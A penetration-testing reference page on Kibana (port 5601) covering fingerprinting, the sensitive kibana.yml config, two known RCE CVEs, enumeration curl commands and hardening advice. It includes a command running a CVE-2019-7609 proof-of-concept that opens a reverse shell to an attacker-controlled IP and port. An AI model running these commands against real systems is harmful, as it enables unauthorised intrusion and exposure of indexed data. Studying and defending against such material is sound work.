KagisoSec_
Service bank
MONITORING 5601/tcp

Kibana

Elasticsearch's visualization front-end on 5601. Often unauthenticated; older versions carry prototype-pollution and LFI-to-RCE CVEs, and it's a direct window into all Elasticsearch data.

monitoring web-app rce elastic

Ports

PortProtoNotes
5601tcpKibana web UI

Fingerprint

  • 'Kibana' UI; /api/status returns the version
  • Usually paired with Elasticsearch on 9200

Key files

PathHoldsSensitive
/etc/kibana/kibana.yml elasticsearch creds, encryption keys sensitive

Known CVEs

CVEImpact
CVE-2019-7609Timelion prototype pollution → RCE
CVE-2018-17246Local File Inclusion via the Console plugin → RCE

Exploitation primitives

  • Unauthenticated UI → browse all Elasticsearch indices and Dev Tools
  • CVE-2019-7609: Timelion canvas payload spawns a reverse shell as the kibana user
  • CVE-2018-17246: LFI loads a planted JS file for RCE

Overview

Kibana on 5601 visualises Elasticsearch. Even read-only it exposes all indexed data via Dev Tools; older builds escalate to RCE.

Enumeration

Version:

curl -s http://<TARGET>:5601/api/status | jq .version.number

Query Elasticsearch through Kibana’s console (or directly on 9200):

curl http://<TARGET>:9200/_cat/indices?v

RCE (CVE-2019-7609, Timelion)

Start a listener, then submit the Timelion prototype-pollution payload (PoC automates the canvas request):

python3 CVE-2019-7609.py -u http://<TARGET>:5601 -host <YOUR_IP> -port 4444 --shell

Hardening

Enable authentication (X-Pack/OpenSearch security), don’t expose 5601/9200, and patch past 6.6.1.

References